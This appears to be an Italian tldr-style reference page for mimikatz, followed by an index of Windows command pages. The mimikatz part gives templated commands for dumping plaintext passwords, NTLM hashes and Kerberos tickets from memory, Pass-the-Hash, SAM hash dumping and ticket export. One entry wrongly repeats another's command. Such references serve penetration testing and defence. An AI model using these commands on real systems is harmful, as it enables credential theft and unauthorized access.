mimikatz

mimikatz

Interagisce con le credenziali di Windows, esegue dump di credenziali, manipolazione di token e altro. Richiede privilegi di amministratore e in genere viene eseguito su Windows. Maggiori informazioni: https://github.com/gentilkiwi/mimikatz.

  • Esegui mimikatz in modalità interattiva:

mimikatz

  • Abilita i privilegi di debug (necessari per la maggior parte delle operazioni):

mimikatz "privilege::debug"

  • Elenca le sessioni di accesso disponibili:

mimikatz "sekurlsa::logonpasswords"

  • Esegui il dump di password in chiaro, hash NTLM e ticket Kerberos dalla memoria:

mimikatz "sekurlsa::logonpasswords"

  • Esegui Pass-the-Hash con un hash NTLM specifico e avvia un comando:

mimikatz "sekurlsa::pth /user:{{username}} /domain:{{domain}} /ntlm:{{hash}} /run:{{cmd}}"

  • Esegui il dump degli hash del database SAM locale:

mimikatz "lsadump::sam"

  • Estrai i ticket Kerberos ed esportali su file:

mimikatz "kerberos::list /export"

  • Esci da mimikatz:

exit

windows

date Mostra o imposta la data del sistema.
explorer Il file explorer di Windows.
mimikatz-dpapi Interagisce con la Windows Data Protection API (DPAPI).
mimikatz Interagisce con le credenziali di Windows, esegue dump di credenziali, manipolazione di token e altro.
h Questo comando è un alias per `Get-History`.
ren Questo comando è un alias per `Rename-Item`.
chrome Questo comando è un alias per `chromium`.
ghy Questo comando è un alias per `Get-History`.
bleachbit Questo comando è un alias per `bleachbit_console`.
cuninst Questo comando è un alias per `choco uninstall`.
choco-install Installa uno o più pacchetti con Chocolatey.
ventoy Questo comando è un alias per `Ventoy2Disk`.
robocopy Copia robusta di file e directory.
mimikatz-crypto Manipola i servizi crittografici di Windows e i certificati, consentendo di elencare ed esportare certificati e chiavi, anche se contrassegnati come non esportabili.
mount Montare le condivisioni di rete del Network File System (NFS).
pwsh-where Questo comando è un alias per `Where-Object`.
cls Pulisce lo schermo del terminale.
choco-apikey Gestisci le chiavi API per le fonti di Chocolatey.
diskpart Gestore di dischi, volumi e partizioni.
history Questo comando è un alias per `Get-History`.
chkdsk Controlla il file system e i metadata dei dischi per cercare errori.
clip Copia il contenuto di input negli Appunti di Windows.
gcb Questo comando è un alias per `Get-Clipboard`.
clist Questo comando è un alias per `choco list`.
cd Mostra informazioni riguardo alla directory corrente e permette di muoversi in un altra directory.
xcopy Copia di file e directory.
attrib Mostra o cambia gli attributi di file e cartelle.
iwr Questo comando è un alias per `invoke-webrequest`.
ipconfig Mostra e gestisce le configurazioni di rete di Windows.
mimikatz-kerberos Interagisce con i ticket Kerberos.
color Imposta i colori di primo piano e di sfondo della console.
clhy Questo comando è un alias per `Clear-History`.
slmgr Questo comando è un alias per `slmgr.vbs`.
rni Questo comando è un alias per `Rename-Item`.
mimikatz-lsadump Esegue il dump di segreti dalla Windows Local Security Authority (LSA).
rd Questo comando è un alias per `rmdir`.
sal Questo comando è un alias per `Set-Alias`.
exit Esci dall'istanza CMD corrente o dal file batch corrente.
logoff Termina una sessione di accesso.
whoami Mostra informazioni riguardo all'utente utilizzato.
ftp Trasferisci file in modo interattivo tra un server FTP locale e remoto.
winget Gestore pacchetti a linea di comando di Windows.
del Cancella uno o più file.
mimikatz-event Gestisce i record del Windows Event Log.
sls Questo comando è un alias per `Select-String`.
choco Interfaccia a linea di comando per il gestore pacchetti Chocolatey.
scb Questo comando è un alias per `Set-Clipboard`.
tasklist Mostra una lista dei processi in esecuzione su una macchina locale o remota.
wget In PowerShell, questo comando può essere un alias di `Invoke-WebRequest` quando il programma originale `wget` (<https://www.gnu.org/software/wget>) non è installato correttamente.
cinst Questo comando è un alias per `choco install`.
dir Elenca i contenuti di una directory.
cmd L'interprete dei comandi di Windows.
cpush Questo comando è un alias per `choco push`.